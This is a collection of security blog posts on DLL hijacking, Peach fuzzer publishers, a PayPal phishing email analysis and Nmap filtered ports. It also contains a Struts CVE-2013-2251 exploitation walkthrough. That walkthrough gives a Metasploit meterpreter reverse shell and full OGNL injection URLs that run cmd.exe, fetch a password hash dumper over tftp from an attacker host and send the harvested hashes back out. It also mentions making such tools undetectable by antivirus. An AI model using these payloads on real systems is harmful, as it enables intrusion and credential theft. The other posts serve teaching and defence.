
Unsafe DLL Loading Vulnerabilities

By Muralidharan Vadivel.

A common issue we see in applications is the order in which they load DLLs at runtime. This is referred to as a load order vulnerability, which can result in local privilege escalation. It became popular a few years ago after the release of a Microsoft advisory affecting a number of Microsoft products. In this blog post we'll dissect the vulnerability, exploitation scenarios, and how to fix it.

First, let's look at the two different types of unsafe DLL loading vulnerabilities: DLL hijacking and component resolution failure.

What is DLL Hijacking?

A Microsoft article explains it as “When an application dynamically loads a dynamic-link library without specifying a fully qualified path name, Windows attempts to locate the DLL by searching a well-defined set of directories in a particular order, as described in Dynamic-Link Library Search Order. If an attacker gains control of one of the directories on the DLL search path, it can place a malicious copy of the DLL in that directory. This is sometimes called a DLL preloading attack or a binary planting attack. If the system does not find a legitimate copy of the DLL before it searches the compromised directory, it loads the malicious DLL. If the application is running with administrator privileges, the attacker may succeed in local privilege elevation”

In simple terms, if an application (e.g. Test.exe) loads a DLL (e.g. foo.dll) by name alone, Windows follows a specific search order, depending on whether "SafeDllSearchMode" is enabled or disabled, to locate the legitimate DLL. If an attacker has knowledge of this application, he can place a malicious DLL with the same name as the legitimate DLL in its search path, forcing the application to load the malicious DLL and leading to remote code execution. SafeDllSearchMode places the user's current working directory later in the search order.

Assuming that SafeDllSearchMode is enabled, the system searches the directories in the following order:

  1. The directory from which the application loaded.
  2. System directory (C:\Windows\System32).
  3. The 16-bit system directory (C:\Windows\System).
  4. The Windows directory (C:\Windows).
  5. The Current Directory.
  6. Directories that are listed in the PATH variables.


This issue has not traditionally been considered a serious threat because it requires local file system access on the victim's host for successful exploitation. The following section describes some realistic attack scenarios:

  1. Combining carpet bombing with unsafe DLL loading: When the victim visits a malicious web page, attackers can make the browser automatically download arbitrary files. This is referred to as a carpet bomb attack. The flaw leads to remote code execution if the vulnerable application checks the desktop directory first when resolving the DLL. For example, the Safari web browser was vulnerable to carpet bombing, and Internet Explorer 7 loads sqmapi.dll when it runs; if a carpet bomb attack drops a malicious sqmapi.dll into the victim's desktop directory, IE7 loads it and executes arbitrary code.
  2. Sending the victim an archive file containing a shortcut to the vulnerable application along with the malicious DLL. Since many vulnerable applications resolve the missing DLL in the startup directory, this can be used to load the malicious DLL when the shortcut is clicked. This can also be combined with a carpet bombing attack.
  3. Opening a document can load certain files placed in the same directory as the document. An attacker can send an archive containing the document along with a malicious DLL to exploit this kind of behavior.


Component Resolution Failure

This occurs when an application fails to resolve a DLL because the DLL does not exist in the specified path or search directories. If this happens, a malicious DLL with the same name can be placed in that path, leading to remote code execution.

Identifying Load Order Issues

We can identify these issues with the help of Process Monitor. To use Process Monitor to examine unsafe DLL loading issues:

  1. Start process monitor
  2. Include the following filters
    • Process Name begins with “Name of the process”
    • Operation is CreateFile
    • Operation is LoadImage
    • Path ends with dll
    • Result is Name Not Found
  3. Exclude the following filters
    • Process Name begins with “Name of the process”
    • Operation is RegQueryValue
    • Operation is RegOpenKey

  4. Start your application and observe the Process Monitor output, looking for DLLs that are searched for in the current directory, system directory, etc. There is a good chance that these DLLs could be vulnerable. Also identify DLLs that are not present in the specified directory; these can lead to the component resolution failure issue.

  5. Download wab32res.dll from http://www.binaryplanting.com/demo/windows_address_book/
  6. Rename this DLL to one of the vulnerable ones identified in step 4 and place it in the appropriate folder
  7. Restart the vulnerable application and observe whether wab32res.dll gets loaded by the application

Fixes

  1. Wherever possible, specify a fully qualified path when using the LoadLibrary, LoadLibraryEx, CreateProcess or ShellExecute functions.
  2. Consider using DLL redirection or manifest to ensure that your application uses the correct DLL
  3. When using the standard search order, make sure that safe DLL search mode is enabled. This places the user's current directory later in the search order, increasing the chances that Windows will find a legitimate copy of the DLL before a malicious copy
  4. Consider removing the current directory from the standard search path by calling SetDllDirectory with an empty string (""). This should be done once early in process initialization, not before and after calls to LoadLibrary. Be aware that SetDllDirectory affects the entire process and that multiple threads calling SetDllDirectory with different values can cause undefined behavior. If your application loads third-party DLLs, test carefully to identify any incompatibilities
  5. Do not use the SearchPath function to retrieve a path to a DLL for a subsequent LoadLibrary call unless safe process search mode is enabled

Creating Custom Peach Fuzzer Publishers

by Brad Antoniewicz.

Peach is arguably the most established, freely available fuzzer out there. It has tons of built-in functionality to support a huge range of features. While you can data model even the most complex protocols, you can only go so far with a PeachPit before you realize that you just need a custom publisher. In this blog post we'll show how to write and compile a custom publisher so you can spend all your CPU cycles fuzzing the stuff that matters.

When Is It Time?

Since you can do so much with a DataModel and a StateModel, identifying when it's time to transition from a PeachPit to a custom publisher can be tough. To me, it all depends on what you're looking to fuzz. The most common case is your target protocol or file format has multiple levels of encapsulation. Sure, you could easily DataModel this encapsulation, but then you're stuck manually excluding higher level encapsulated data. And in some cases, the encapsulation creates a situation that the DataModel just can't handle.

Here's a sort of interesting example I've recently come across. The application implemented its own custom protocol within a TLS tunnel. The tricky part here is that it was all over UDP. So there had to be another layer of encapsulation (XYZ Proto) above TLS but below UDP to keep state of the TLS tunnel, since UDP is stateless. Here's what the encapsulation looked like from a high level:



Now if we're just looking to fuzz XYZ Proto then a DataModel here using the UDP Publisher would do just fine. However, since we're looking to fuzz Custom Protocol, we have a bit of work to do. Establishing a TLS tunnel is beyond the purpose of the DataModel, and the only way for us to get at the important part is to build a custom publisher.

If you're just dealing with file formats, this same idea still applies, but it's more likely you can build out the DataModel for the entire file format, rather than hitting the TLS brick wall. That being said, it might not be necessary to build the DataModel for the higher level file formats if a custom publisher can be written.

Compiling Peach

Technically, you don't have to compile Peach from source. A little later on I'll walk you through compiling your custom Publisher without the entire Peach source code. But the reality is that when you're building your Publisher, you'll need to look at the source of other Publishers to get a better understanding of how everything works, so you might as well learn to build everything from source anyway.

Download the source package from Peach's sourceforge page. I'd recommend downloading the latest Beta source code, rather than the stable source, so that you can take advantage of bug fixes, etc.



Compiling from source is as simple as it gets thanks to a handy build script:

root@kali:~/peach-3.1.53-source# ./waf configure
root@kali:~/peach-3.1.53-source# ./waf build
root@kali:~/peach-3.1.53-source# ./waf install


Peach will install the compiled binaries into output/linux_x86_release/bin and output/linux_x86_debug/bin.

Publisher Structure

Publishers are located within the Peach.Core/Publishers directory of the source package. There are a number available for you to use as a reference. Basically every publisher inherits from the Publisher class (Peach.Core/Publisher.cs) and should override a few key functions that are tied back to the corresponding Action types referenced in the PeachPit. The following table provides a summary of those functions (all are of type protected virtual void unless otherwise noted; descriptions are from the Publisher.cs source).

Function - Description
OnStart() - Called when the publisher is started. This method will be called once per fuzzing "Session", not on every iteration.
OnStop() - Called when the publisher is stopped. This method will be called once per fuzzing "Session", not on every iteration.
OnOpen() - Open or connect to a resource. Will be called automatically if not called specifically.
OnClose() - Close a resource. Will be called automatically when the state model exits. Can also be called explicitly when needed.
OnAccept() - Accept an incoming connection.
OnInput() - Read data.
OnOutput(BitwiseStream data) - Send data.
protected virtual Variant OnCall(string method, List args) - Call a method on the Publisher's resource.
OnSetProperty(string property, Variant value) - Set a property on the Publisher's resource.
protected virtual Variant OnGetProperty(string property) - Get the value of a property exposed by the Publisher's resource.


Depending on the purpose of the Publisher, some of the above functions are more important than others. For instance, if we're only concerned with modifying the output of data right before it's sent, then we'd just override OnOutput().

Getting Started

From here on out we'll demonstrate everything else you need to get started by building a simple example that adds a layer of encapsulation within the UDP protocol. This example would be trivial to add to a DataModel, but for the sake of demonstration, we'll implement it in a Publisher.

First up we'll start out by making a copy of the UdpPublisher which extends the SocketPublisher class:

root@kali:~/peach-3.1.53-source/Peach.Core/Publishers# cp UdpPublisher.cs MyCustomPublisher.cs


We'll set the name for our Publisher that will be referenced in the PeachPit by replacing "Udp" with "MyCustomPublisher" on line 35:

[Publisher("MyCustomPublisher", true)]


And name the class of our publisher by replacing "UdpPublisher" with "MyCustomPublisher" on line 43:

 public class MyCustomPublisher: SocketPublisher


and line 49:

 public MyCustomPublisher(Dictionary<string, Variant> args


And that's it! We have our custom publisher all done! Granted, it's really a waste at this point since it's exactly the same thing as the UdpPublisher, but nonetheless it's still custom :)

Extending Functionality

To make this example a little more interesting, let's add that layer of encapsulation, something like this:



Here we care about fuzzing Custom, but not ABC Proto. So we'd create a custom Publisher to handle ABC Proto and a DataModel for fuzzing Custom. Let's say ABC Proto is structured this way:



The first thing we'll need to do in our new Publisher is override the OnOutput function so that we can modify the data before it's sent. So we'll add a new line after line 72 and insert:

protected override void OnOutput(BitwiseStream data)
{

}


Now comes our program body: we'll need to build a new packet with ABC Proto's header and length fields. The header is a 2-byte static value of 0x1234, and the length is a 2-byte value holding the length of the data field in network byte order. Since the length field is only 2 bytes, we first need to put in some intelligence that ensures the length of the data does not exceed the maximum value of that field.

int totalPktLen = (int)data.Length + 4;

if (totalPktLen > 65535) {
Logger.Debug("ABC Proto Max Packet Length Reached, capping at 65535");
totalPktLen = 65535;
}

if ( totalPktLen <= 0 ) {
Logger.Debug("ABC Proto Min PacketLength Reached, just setting to 4 to account for header and length fields");
totalPktLen = 4;
}


This can be a controversial move, and it's an important point to make about custom publishers. Our intention is to fuzz the heck out of Custom Protocol, and as part of that fuzzing we should be trying really long strings and other extreme values. By implementing this limitation we are effectively limiting our test cases. It might be worthwhile to just forget about an accurate value in the ABC Proto length field, as it might lead to more vulnerabilities.

That being said, let's leave that option up to the end user of the publisher. We'll do that via a parameter that we'll implement a little further down below.

Next we'll create our ABC Proto start header, which is just the constant 0x1234:

byte[] abcProtoHdr = { 0x12, 0x34 } ;


Our final product will be a buffer containing the original data packet encapsulated within ABC Proto, so here we'll create that buffer:

var buffer = new byte[totalPktLen];


Now we'll build our packet by first copying the ABC Proto Header into the buffer:

Array.Copy(abcProtoHdr, 0, buffer, 0, abcProtoHdr.Length);


Next we'll handle the length field. It needs to be in network byte order, so we'll do that with Array.Reverse() after we copy it to the output buffer:

Array.Copy(BitConverter.GetBytes(totalPktLen - 4), 0, buffer, abcProtoHdr.Length, sizeof(ushort));
Array.Reverse(buffer, abcProtoHdr.Length, sizeof(ushort));


To wrap up the buffer we'll just copy over the original data:

data.Read(buffer, abcProtoHdr.Length + sizeof(ushort), buffer.Length - 4);


At this point we've built in that ABC Proto layer of encapsulation. Since that's all we really needed to do, we can pass that data to the original OnOutput() function that SocketPublisher implements to send:

base.OnOutput(new BitStream(buffer));


Passing Parameters

Ok, back to that ABC Proto length issue we ran into earlier. We could either restrict the data length and limit our fuzzing, or just ignore it. The best approach might be to allow the user to make that decision via a Parameter passed to the publisher. To do this we'll need to create a new parameter by inserting a new line after line 51 and providing:

[Parameter("StrictLength", typeof(bool), "Enforce the ABC Proto Length Restrictions (may limit fuzz cases)", "true")]


Here we have StrictLength as a boolean option, set to true by default. Next we'll need to create a local variable for it by inserting a new line after line 62:

public bool StrictLength { get; set; }


And now we can wrap our length adjustment code into an if statement:

 if (StrictLength) {
if (totalPktLen > 65535) {
Logger.Debug("ABC Proto Max Packet Length Reached, capping at 65535");
totalPktLen = 65535;
}

if ( totalPktLen <= 0 ) {
Logger.Debug("ABC Proto Min PacketLength Reached, just setting to 4 to account for header and length fields");
totalPktLen = 4;
}
}


Alright! Our custom ABC Proto publisher is written! On to compiling..

Compiling with dmcs

We could recompile the entire Peach source code as per the instructions above, or, using a standard Peach binary release, we can save time by compiling only our new custom publisher. Peach runs on Linux with the help of the Mono framework, which allows .NET applications to run on a number of different platforms. The dmcs utility is a C# compiler within Mono, which we'll use on our Kali installation.
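
If dmcs isn't already on your system, it's provided by the Mono compiler packages; the package name below is an assumption for Debian-based distributions like Kali:

 root@kali:~# apt-get install mono-devel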

Enter the peach binary release directory with your MyCustomPublisher.cs copied into it, and compile with:

 dmcs MyCustomPublisher.cs -out:MyCustomPublisher.dll -target:library -r:Peach.Core.dll,NLog.dll


If all went well, you should have a MyCustomPublisher.dll!

Calling from the PeachPit

The last thing we need to do is call our custom publisher from a PeachPit via the <Publisher> tag within our Test definition:

<Test name="Default">
<StateModel ref="CustomProtocolOutput"/>

<Publisher class="MyCustomPublisher">
<Param name="Host" value="192.168.1.1"/>
<Param name="Port" value="12345"/>
</Publisher>
</Test>


The full PeachPit for this project can be found here.

Testing with Wireshark

We'll run a single instance of our fuzz case and use Wireshark to inspect output on the wire:

 root@kali:~/peach-3.1.53-linux-x86-release# mono peach.exe MyCustomPublisherDataModel.xml -1

[[ Peach v3.1.53.0
[[ Copyright (c) Michael Eddington

[*] Test 'Default' starting with random seed 5136.

[R1,-,-] Performing iteration

[*] Test 'Default' finished.


Now Wireshark doesn't have a plug-in to parse our ABC Proto (WTH Wireshark dev team?!), but if we look at the raw data we can see our ABC Proto header and length fields, and included within the data is the content of our DataModel.



Source Code

If you'd like to reference the source code for this project, head over to Github:



Got any tips for creating publishers? Share below in the comments!



Y U Phish Me? [Part 1]

By Melissa Augustine.

Some emails have been censored for your protection :)

A few days ago while I was browsing my inbox, I came across an interesting email from "Paypal" with the subject of "Help Centre!". Something didn't look right. Here's the Email:



I was a bit suspicious of this, but at first blush it looked pretty OK. Then I looked at the email header:



support@paypal.com via shepard.sypherz.com? I'm pretty sure Paypal hasn't decided to send email through a third party, something is odd here.

SMTP Header

Let's dig a bit more into the header. You can click on the down arrow (near the "Reply" button in the new Gmail interface) and click 'Show Original' to see the full header.

When analyzing SMTP header data you start at the bottom (first action) and work up to the top (most recent action):



Let's dig into each of the numbered areas of this header:

  1. This section shows the actual sending of the email from shepard.sypherz.com. Postfix is an open source mail agent. Also note the time and date, January 11, 2014 09:55:01 (-0600). This gives us an idea of the timezone of the offending server, and we can do some DNS lookups to try and find anything interesting about it.
  2. Here we see something about 'authentication results' and an SPF string. SPF stands for Sender Policy Framework and is meant to detect spam and spoofing by verifying the sender's IP address.

    From Wikipedia:
    "SPF allows administrators to specify which hosts are allowed to send mail from a given domain by creating a specific SPF record (or TXT record) in the Domain Name System (DNS)".

    So basically, if I am trying to relay mail through a non-authorized IP and SPF is enabled, it would be blocked. We see here, though, that the IP address 95.211.6.133 (www-data@shepard.sypherz.com, another domain name) was vouched for by its DNS. Well, that's nice. We can do an nslookup to see what we can learn about that IP (see the sketch after this list):



    This looks like a Netherlands (NL) IP; Geo-IP confirms this.



  3. Next we see it getting handed over to google.com. We see another server name which we saw earlier with nslookup, nexus.sypherz.com. The time here is 07:55:03 -0800 (PST), the time zone for Mountain View, CA.
  4. We then see it bouncing around Google (it's 10.x.x.x, which means internal servers)
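
As mentioned in item 2 above, a quick way to check that sending IP from the command line (a sketch; reverse DNS and whois output will change over time):

 $ nslookup 95.211.6.133
 $ whois 95.211.6.133 | grep -i country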


Ok, so what that means is... well, it's not from Paypal at all :)

Email Addresses

I can also see (just take my word for it) that there are a decent number of email addresses in here. I copy and paste them out to a text file, but they are not one per line, so it's hard for me to do much with them (I like order). Vim provided a great solution:

/[ ]
:%s//\r&/g


The above is two separate commands run within vim. The first one searches for whatever is in the square brackets, in our case a space. The second says to substitute (:%s) every occurrence (the g flag) of the last search (an empty pattern reuses it) on every line (the %) with a newline followed by the matched text (\r&). If that doesn't make sense, look here. I still had to go through and fix a few email addresses up (I think it was due to addresses hitting the edge and continuing on the next line), but in the end, a lot less work than doing it all by hand!
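
If you'd rather skip vim, a rough grep equivalent can pull the addresses straight out of the saved email (a sketch; the regex is approximate and the file names are assumptions):

 $ grep -E -o "[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]+" original_email.txt > address.txt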

Now that that's done, let's see what we got.

$ wc -l address.txt
>> 2887 address.txt

$ sort address.txt | uniq > uniqaddress.txt
$ wc -l uniqaddress.txt
>> 2887 uniqaddress.txt



So they're all unique addresses, and it looked like part of a larger list. I say this because it started with m's and ended at z's, and the list, pre-editing, already looked sorted.

Domains

Ok great, let’s scroll down the original text to view the message body. You can see the HTML here

Looking at it, it's hard to see what you are looking for, but let's focus on domains again. I'll copy out the body and save it as a file (body.txt). Next, some command line magic to pull out all URLs with "http".

$ grep -E -o "http://[a-zA-Z0-9.-_]+" body.txt 
>> http://images.paypal.com/en_US/i/logo/logo_emailheader_113wx46h.gif
>> http://images.paypal.com/en_US/i/scr/pixel.gif
>> http://images.paypal.com/en_US/i/scr/scr_emailTopCorners_580wx13h.gif
>> http://images.paypal.com/en_US/i/scr/pixel.gif
>> http://hoabinhltd.com/
>> http://images.paypal.com/en_US/i/scr/pixel.gif
>> http://images.paypal.com/en_US/i/scr/scr_emailBottomCorners_580wx13h.gif
$ grep -c http body.txt
>> 6




Whew! Let's go through the first grep, shall we?

  • grep - pretty obvious, invokes the command grep
  • -E - this will interpret the pattern as an Extended regular expression
  • -o - prints only the matching part of the line (not the whole line which is default)
  • “[stuff]” - this is our regex
    • http:// - find me anything with 'http://'
    • [a-zA-Z0-9.-_]+ - in addition, find me one or more (that's the +) instances of alphanumeric characters (upper and lower), a '-', an '_', or a dot '.'


I ran the last grep to make sure I didn't miss anything. I see a discrepancy: the count gave me 6 but the regular expression gave me 7... what gives? Well, if you look at the man page for grep, you'll see that -c counts the lines where the expression was found. So this means http was found twice on one line. I could have also piped into another grep to remove the paypal entries with the -v option. You can look for https domains with this as well!

$ grep -E -o "http://[a-zA-Z0-9.-_]+" body.txt | grep -v paypal
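
The same approach catches https links too if the pattern is loosened slightly (a sketch):

 $ grep -E -o "https?://[a-zA-Z0-9./_-]+" body.txt | grep -v paypal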



Sweet, I instantly found a domain I may want to focus on! We can search in vim for the domain to get more context as to when that domain was called.

<td><span style="color: rgb(8, 68, 130); outline-width: 0px;"<p>Click Update to Confirm Your Account Now <a href="http://hoabinhltd.com/" target=_blank>  update</a></td>



Well this definitely looks like what I would call the suspicious domain! CentralOps provides some information about the domain:



..and we can use Geo-IP as well:



So this is looking like a classic phishing campaign… what happens if we go to this domain? Tune in next time, same blog time… same blog channel!

Y U Phish Me? [Part 2]

By Melissa Augustine.

In the last blog post we did some research on a spear phishing email I received. We used vim and regex to make our lives a bit easier for analysis purposes, and we extracted a suspicious URL.

What’s left to do… well, go to the URL of course!

Paros Proxy

For this instance I am using Paros Proxy, but by no means assume that is the proxy you must use. There are quite a few proxies out there, so use whichever one you are comfortable with. Don't forget to point your browser settings at the proxy port so you don't miss any traffic!

There is a spiffy basic howto for using Paros here.

For this exercise, I want to ensure that I am capturing both requests and responses. This means every time I send a request from my web browser, or receive a response from the server, Paros will catch it and allow me to decide whether to pass or drop the traffic.

All right, let's go! Simply enter our suspicious domain hxxp://hoabinhltd.com in the browser and click pass in Paros to see what we get back:

 HTTP/1.1 302 Moved Temporarily
Date: Mon, 13 Jan 2014 23:58:06 GMT
Server: Apache
X-Powered-By: PHP/5.2.17
Location: http://www.cieneguilla.com/.www.paypal.com/.Update/
Content-Length: 0
Connection: close
Content-Type: text/html



Well then! It looks like we have a redirect here! This is taking us to cieneguilla.com. We know malicious actors like to give us analysts (and our detection devices) a hard time by doing things like this... thanks! It's also interesting that we can see the server type (Apache) and the scripting platform (PHP 5.2). Ok, now we need to pass the new GET request through Paros.

nslookup

Let’s get some information on this new domain, cieneguilla.com.

 $nslookup cieneguilla.com

Non-authoritative answer:
Name: cieneguilla.com
Address: 66.225.230.234



From CentralOps.net:

 Queried whois.networksolutions.com with "cieneguilla.com"...
Domain Name: CIENEGUILLA.COM
Registry Domain ID:
Registrar WHOIS Server: whois.networksolutions.com
Registrar URL: http://www.networksolutions.com/en_US/
Updated Date: 2012-04-12T00:00:00Z
Creation Date: 2007-04-29T00:00:00Z
Registrar Registration Expiration Date: 2014-04-27T00:00:00Z
Registrar: NETWORK SOLUTIONS, LLC.
Registrar IANA ID: 2
Registrar Abuse Contact Email: abuse@web.com
Registrar Abuse Contact Phone: 1-800-333-7680
Reseller:
Domain Status: clientTransferProhibited
Registry Registrant ID:
Registrant Name: Huanca, Italo
Registrant Organization: PUBLITOUR
Registrant Street: Av. San Martin Zona D LtD-15, Cieneguilla
Registrant City: Lima
Registrant State/Province: Lima
Registrant Postal Code: Lima 40
Registrant Country: PE



Following the HTTP Session

We get a few more redirects, but we eventually get to some web content to view. What I found interesting was the variety in the responses received (different technologies, different content-types).

 HTTP/1.1 302 Moved Temporarily
Date: Mon, 13 Jan 2014 23:58:49 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
location: cf5de2ce4e96c1b32c29ab46a8e8eaa6
Vary: User-Agent,Accept-Encoding
Content-Length: 0
Content-Type: text/html



And another:

 HTTP/1.1 301 Moved Permanently
Date: Mon, 13 Jan 2014 23:59:17 GMT
Server: Apache
Location: http://www.cieneguilla.com/.www.paypal.com/.Update/cf5de2ce4e96c1b32c29ab46a8e8eaa6/
Vary: Accept-Encoding
Content-Length: 292
Content-Type: text/html; charset=iso-8859-1



Here's what the final page looks like rendered:



What we are presented with is a PayPal login. It looks a bit lacking on the content side, no HTTPS is enabled (most sites have you in a secure session during log in... or at least I hope so), and it's quite obvious that the URL is not PayPal. Nevertheless, let's put in some data and see what happens. Paros stops the POST request.



Well, it looks like a PHP script (Snd1.php) is being passed my login parameters. So now these nice people have poor Rico Suave's PayPal information. Looking at the tabs/address bar you see they even use the PayPal logo (but do not even try to hide the domain name difference) in an attempt to trick the user into believing they are interacting with PayPal.

I also notice that the long alphanumeric string in the URL changes every time I visit the page. This must be my unique identifier. I ran it against HashID and it guessed it to be an MD5 hash.
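
To reproduce that check from the command line, the hashid tool will list the likely candidates (a sketch, assuming hashid is installed; the online version works just as well):

 $ hashid cf5de2ce4e96c1b32c29ab46a8e8eaa6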



I bet everyone can figure out what happens next… Here is Rico’s address and credit card information (not even verified by the server to be a valid credit card number).

Here's the web page asking for address:



And Paros catching the request:



The web page next asks for the card info:



And Paros catching the request:



After all of this, the site kindly redirects you to the real PayPal. If you still have Paros running at this point, you get some certificate issues because the REAL PayPal establishes an SSL connection and Paros uses its own certificate so it can see inside HTTPS traffic:





This was an example of a classic phishing campaign. Sometimes these actors like to throw some malware at you just to make sure they ensnare you; however, this one was a simple credential harvester.

Attacking Struts with CVE-2013-2251

By Mike McGilvray.

Apache Struts is a free, open-source, MVC framework for creating elegant, modern Java web applications. It favors convention over configuration, is extensible using a plugin architecture, and ships with plugins to support REST, AJAX and JSON.

Would-be attackers target Apache Struts because of its popularity among web developers. A search for the term ‘struts’ on The National Vulnerability Database indicates that there were ten vulnerabilities related to Apache Struts in 2013 with seven of them rated as High. In addition, exploit code is in circulation in the wild and publicly available in attack frameworks such as Core Impact and Metasploit.

Finding Struts

You can perform initial discovery using nmap by probing the IP address space specifically for TCP port 8080 which is the default port for a variety of applications such as Apache Tomcat Manager and JBoss. Use the following command:

 root@kali:~# nmap -PN -iL iplist.txt -p 8080 -oG 8080.txt


This produces the output file 8080.txt which must then be parsed to produce a list of potential targets. Use the following command to parse:
 root@kali:~# cat 8080.txt | grep open | cut -d " " -f2 >> potential.txt


The resulting output can then be used in conjunction with the curl command to query potential targets for /struts2-blank/example/HelloWorld.action. If a 200 OK response is received then the IP address is written to an output file. I like to automate this with the following struts.sh shell script:

 #!/bin/bash
STR="200"
for i in `cat potential.txt`
do echo Testing IP Address $i -----
curl -I http://$i:8080/struts2-blank/example/HelloWorld.action -s | grep $STR
if [ $? == 0 ]
then
echo "Apache Struts found, writing IP to struts.txt…"
echo $i >> struts.txt
fi
done



In this example the target address space has just one host, 10.1.1.206, in the resulting struts.txt:


CVE-2013-2251 Pwnage

Now that we know struts is running we can begin to focus in on specific vulnerabilities. For this post we will be focusing on CVE-2013-2251.

CVE Number: CVE-2013-2251
Title: Struts2 Prefixed Parameters OGNL Injection Vulnerability
Affected Software: Apache Struts v2.0.0 - 2.3.15
Credit: Takeshi Terada of Mitsui Bussan Secure Directions, Inc.
Issue Status: v2.3.15.1 was released which fixes this vulnerability

The Struts 2 DefaultActionMapper supports a method for short-circuit navigation state changes by prefixing parameters with "action:" or "redirect:", followed by a desired navigational target expression. This mechanism was intended to help with attaching navigational information to buttons within forms. In Struts 2 before 2.3.15.1 the information following "action:", "redirect:" or "redirectAction:" is not properly sanitized. Since said information will be evaluated as OGNL expression against the value stack, this introduces the possibility to inject server side code.

Normal redirect prefix usage in JSP:

<s:form action="foo">
...
<s:submit value="Register"/>
<s:submit name="redirect:http://www.google.com/" value="Cancel"/>
</s:form>



If the cancel button is clicked, redirection is performed.

Request URI for redirection: /foo.action?redirect:http://www.google.com/

Manual validation can be achieved by using a simple expression in the URI:
 http://10.1.1.206:8080/struts2-blank/example/X.action?action:%25{3*4}
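
You can fire that check from the command line as well; if the target is vulnerable, the evaluated expression (12) should be reflected in the response, typically in the redirect's Location header (a sketch):

 root@kali:~# curl -s -i "http://10.1.1.206:8080/struts2-blank/example/X.action?action:%25{3*4}" | grep 12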


Using Metasploit

Metasploit has a struts_default_action_mapper module which makes attacking vulnerable Struts targets easy.

 Command: msf > use exploit/multi/http/struts_default_action_mapper
Command: msf > set RHOST 10.1.1.206
Command: msf > set PAYLOAD windows/meterpreter/reverse_tcp
Command: msf > exploit



Metasploit identifies the target system as Windows, sets up a local server that offers up the payload and waits for the victim to request the payload.



With a meterpreter shell, you can gain full control over the system:

 Command: meterpreter > getuid
Output: Server username: NT AUTHORITY\SYSTEM

Command: meterpreter > getprivs
Command: meterpreter > hashdump
Output:
Jack:500:aad3b435b51404eeaad3b435b51404ee:2729b27b06359694b3da9aa658be9c1e:::



Manual Exploitation

While frameworks like Metasploit are feature rich, their popularity usually means that they are more likely to be detected. Payload generators like AV0id and Veil can be utilized but, again, popularity inevitably results in detection. Targeted, customized manual attacks are more likely to succeed without detection.

Executing ipconfig

You can use cmd.exe on the target system to execute ipconfig and confirm that the attack permits interaction with the underlying operating system.

 http://10.1.1.206:8080/struts2-blank/example/X.action?redirect:${%23a%3d%28new%20java.lang.ProcessBuilder%28new%20java.lang.String[]{%27cmd.exe%27,%27/c%20ipconfig.exe%27}%29%29.start%28%29,%23b%3d%23a.getInputStream%28%29,%23c%3dnew%20java.io.InputStreamReader%28%23b%29,%23d%3dnew%20java.io.BufferedReader%28%23c%29,%23e%3dnew%20char[50000],%23d.read%28%23e%29,%23matt%3d%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29,%23matt.getWriter%28%29.println%28%23e%29,%23matt.getWriter%28%29.flush%28%29,%23matt.getWriter%28%29.close%28%29} 



The above command will store the output to a file named ipconfig.action on the local system. You can read it using cat:



Uploading Files

Here I'll upload a password hash dumper, gsecdumpv2b5.exe. (Note: I always modify my uploads so that they are fully undetectable (FUD) by antivirus to avoid detection; perhaps that's another blog post!)

To upload:

 http://10.1.1.206:8080/struts2-blank/example/X.action?redirect:${%23a%3d%28new%20java.lang.ProcessBuilder%28new%20java.lang.String[]{%27cmd.exe%27,%27/c%20tftp.exe%20-i%2010.1.1.111%20get%20gsecv2b5.exe%27}%29%29.start%28%29,%23b%3d%23a.getInputStream%28%29,%23c%3dnew%20java.io.InputStreamReader%28%23b%29,%23d%3dnew%20java.io.BufferedReader%28%23c%29,%23e%3dnew%20char[50000],%23d.read%28%23e%29,%23matt%3d%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29,%23matt.getWriter%28%29.println%28%23e%29,%23matt.getWriter%28%29.flush%28%29,%23matt.getWriter%28%29.close%28%29}
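
The tftp.exe transfer above pulls the binary from the attacker's host (10.1.1.111), so a TFTP server needs to be listening there first. A minimal sketch using atftpd on Kali (assuming the package is installed; the directory is arbitrary):

 root@kali:~# mkdir -p /tmp/tftp && cp gsecv2b5.exe /tmp/tftp/
 root@kali:~# atftpd --daemon --port 69 /tmp/tftp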



Executing and Writing Output

After we run gsecv2b5.exe it will output the results to a file called hashes.txt.

 http://10.1.1.206:8080/struts2-blank/example/X.action?redirect:${%23a%3d%28new%20java.lang.ProcessBuilder%28new%20java.lang.String[]{%27cmd.exe%27,%27/c%20gsecv2b5.exe%20-a%20%3E%3E%20hashes.txt%27}%29%29.start%28%29,%23b%3d%23a.getInputStream%28%29,%23c%3dnew%20java.io.InputStreamReader%28%23b%29,%23d%3dnew%20java.io.BufferedReader%28%23c%29,%23e%3dnew%20char[50000],%23d.read%28%23e%29,%23matt%3d%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29,%23matt.getWriter%28%29.println%28%23e%29,%23matt.getWriter%28%29.flush%28%29,%23matt.getWriter%28%29.close%28%29}



Downloading Files

To download hashes.txt:

 http://10.1.1.206:8080/struts2-blank/example/X.action?redirect:${%23a%3d%28new%20java.lang.ProcessBuilder%28new%20java.lang.String[]{%27cmd.exe%27,%27/c%20tftp.exe%20-i%2010.1.1.111%20put%20hashes.txt%27}%29%29.start%28%29,%23b%3d%23a.getInputStream%28%29,%23c%3dnew%20java.io.InputStreamReader%28%23b%29,%23d%3dnew%20java.io.BufferedReader%28%23c%29,%23e%3dnew%20char[50000],%23d.read%28%23e%29,%23matt%3d%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29,%23matt.getWriter%28%29.println%28%23e%29,%23matt.getWriter%28%29.flush%28%29,%23matt.getWriter%28%29.close%28%29}



And just to check it out:

 root@kali:~# cat hashes.txt
Output: Jack(current):500:aad3b435b51404eeaad3b435b51404ee:2729b27b06359694b3da9aa658be9c1e:::



You're Up!

From here you will have to use your imagination on how to expand influence through the network! If you’re interested in just how popular this attack is with Chinese hackers then just Google the phrase “struts2-blank/example/X.action?redirect”.

What's Really Open? Nmap Tips for an Accurate Port List

by Josh Bealey

Anyone who has done lots of port scanning over the internet will know that Nmap often identifies certain ports as filtered. In this blog post, we'll look at alternative scans that can help truly identify the state of a particular port.

Filtered State

Before we continue, let's just hit on what filtered actually is. Nmap's man page gives us details:

Filtered means that a firewall, filter, or other network obstacle is blocking the port so that Nmap cannot tell whether it is open or closed.

And just for completeness, there is also open|filtered so let's just see that description:

Nmap reports the state combinations open|filtered and closed|filtered when it cannot determine which of the two states describe a port. The port table may also include software version details when version detection has been requested.

So let's say we've come up filtered, what can we do? Nmap has a few different types of scans and scan options that may help.

